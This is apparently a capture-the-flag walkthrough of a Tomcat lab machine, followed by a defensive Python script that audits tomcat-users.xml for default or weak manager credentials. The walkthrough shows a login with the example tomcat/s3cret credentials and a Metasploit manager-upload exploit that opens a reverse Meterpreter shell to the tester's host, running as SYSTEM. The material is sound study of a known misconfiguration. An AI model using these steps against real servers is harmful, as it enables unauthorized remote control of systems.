Latest revision as of 00:03, 21 January 2023
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 17:44 MST
Nmap scan report for 10.129.30.107
Host is up (0.055s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
Clicking around gets a 401 error, but the error page gives creds...
# 401 Unauthorized
You are not authorized to view this page. If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation. That file must contain the credentials to let you use this webapp.
For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
/manager
Creds work! Let's run msfconsole to try to get a shell.
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 7ZKrlUtgk...
[*] Executing 7ZKrlUtgk...
[*] Sending stage (58851 bytes) to 10.129.30.107
[*] Undeploying 7ZKrlUtgk ...
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.30.107:49192) at 2022-12-16 18:01:49 -0700
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\sys
Works!
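The root cause here is that conf/tomcat-users.xml still held the example credentials printed on the 401 page, attached to the manager-gui role. The following audit script is an added example, not part of the original writeup: it parses a tomcat-users.xml and flags entries like that one. The sample file, every credential pair other than tomcat/s3cret, and the weak-password list are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Roles that grant access to the Tomcat manager / host-manager applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
# tomcat/s3cret is the pair shown on the 401 page; the others are assumed
# sample pairs added for illustration.
EXAMPLE_CREDS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}
WEAK_PASSWORDS = {"password", "changeme", "admin", "tomcat"}  # assumed list

# Constructed sample config (not taken from the target box).
SAMPLE = """<tomcat-users>
  <!-- <user username="role1" password="tomcat" roles="role1"/> -->
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="deploy" roles="manager-script,manager-jmx"/>
  <user username="ops" password="kV9#tq2LxW7mPz" roles="manager-status"/>
  <user username="viewer" password="password" roles="reports"/>
</tomcat-users>"""

def audit_tomcat_users(xml_text):
    """Return (username, severity, reason) for each weak <user> entry."""
    findings = []
    # Commented-out entries are dropped by the parser, so only live users count.
    for el in ET.fromstring(xml_text).iter():
        # Newer config files declare an XML namespace; compare the local name.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        user, pw = el.get("username", ""), el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        if (user, pw) in EXAMPLE_CREDS:
            reason = "documented example credentials"
        elif pw.lower() == user.lower():
            reason = "password equals username"
        elif pw.lower() in WEAK_PASSWORDS:
            reason = "common password"
        else:
            continue
        # A weak login is critical when it unlocks manager or admin roles.
        severity = "critical" if roles & PRIVILEGED_ROLES else "warning"
        findings.append((user, severity, reason))
    return findings

if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE):
        print(*finding, sep="\t")
```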